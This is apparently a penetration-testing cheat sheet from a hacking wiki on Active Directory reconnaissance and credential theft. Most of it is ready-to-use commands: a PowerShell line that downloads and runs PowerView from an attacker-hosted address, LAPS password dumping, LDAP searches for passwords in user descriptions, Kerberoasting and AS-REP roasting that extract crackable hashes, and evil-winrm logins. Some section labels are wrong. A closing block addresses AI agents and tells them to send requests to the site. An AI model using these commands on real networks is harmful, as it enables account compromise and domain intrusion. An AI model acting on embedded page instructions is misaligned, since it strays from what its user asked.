# Active Directory Recon

## Check User's Priviledge in Domain

```
net user <current user> /domain
```

### Global Group = PswReader

this group is able to read LAPS

> Global Group memberships **\*Domain Users \*PswReaders**

```
// import the powerview.ps1
IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.x/powerview.ps1')

// dump the password information

Get-ADObject <hostname1>,<hostname2>
```

## **Object Control List (ACL)**

```
GenericAll --> Full permission on object
GenericWrite --> Edit certain attributes on the object
WriteOwner --> Change ownership of the object
WriteDACL --> Edit ACE's applied to object
AllExtendedRights --> Change password, reset password, etc.
ForceChangePassword --> Password change for object
Self (Self-Membership) --> Add ourselves to for example a group
```

## **LDAP Search**

**Priviledges: Domain User**

1. **LDAPSearch.ps1**

```
$ldapFilter = " PUT FILTER HERE "
$domain = New-Object System.DirectoryServices.DirectoryEntry
$search = New-Object System.DirectoryServices.DirectorySearcher
$search.SearchRoot = $domain
$search.Filter = $ldapFilter
$search.SearchScope = "Subtree"

$results = $search.FindAll()
foreach ($result in $results)
{
    $object = $result.GetDirectoryEntry()
    Write-Host "Object Name = " $object.name
}
```

Filter

ref: <https://www.youtube.com/watch?v=-xF6bvbXCGE&list=PL8383xoY3ZibjcFWjDhabUGOjoZ4Ke8Yu&index=2>

```
LDAP RECON
================

# look at all domain controllers
(primaryGroupID=516)

# look at all domain admins

(&(objectCategory=person)(objectClass=user)((memberOf=CN=Domain Admins,CN=Users,DC=TEST,DC=local)))

# unconstrained Delegations users
(userAccountControl:1.2.840.113556.1.4.803:=524288)
```

2. **Using Powershell**

<pre><code><strong>
</strong><strong># show the password in the description
</strong><strong>Import-Module ActiveDirectory
</strong>Get-ADObject -LDAPFilter "(&#x26;(objectClass=user)(description=*pass*))" -property * | Select-Object SAMAccountName, Description, DistinguishedName
</code></pre>

## Have User & Pass SVC?

Some times services account indicate a Ticket possibility:\
Don't miss this check:

\[Have SPN]

<pre><code># ASP-REP Roasting attack

# identification
impacket-GetUserSPNs -dc-ip &#x3C;IP DC> &#x3C;domain>/&#x3C;username>


impacket-GetUserSPNs -dc-ip &#x3C;IP DC> &#x3C;domain>/&#x3C;username>:&#x3C;password> -request
<strong>impacket-GetUserSPNs -dc-ip &#x3C;IP DC> -request '&#x3C;domain' -format hashcat
</strong>
<strong>
</strong>

Rubeus.exe asreproast /format:hashcat /outfile:C:temphash.txt
</code></pre>

## Have User List?

Is there config "kerberost pre-auth is disable" on user.

```
impacket-GetNPUsers <domain>/ -usersfile users.txt -format hashcat

# login with evil-winrm
evil-winrm -i <ip> -u <username> -p <password>
```

## TGT?

look at htb scrambled

## PsLoggedon.exe

Check logged on users on the remote computer via active directory.

```
.\PsLoggedon.exe \\<computername>

```

## Seatbelt.exe

```
.\Seatbelt.exe -group=all
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hacker-mind.gitbook.io/hacker-mind/active-directory-recon.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.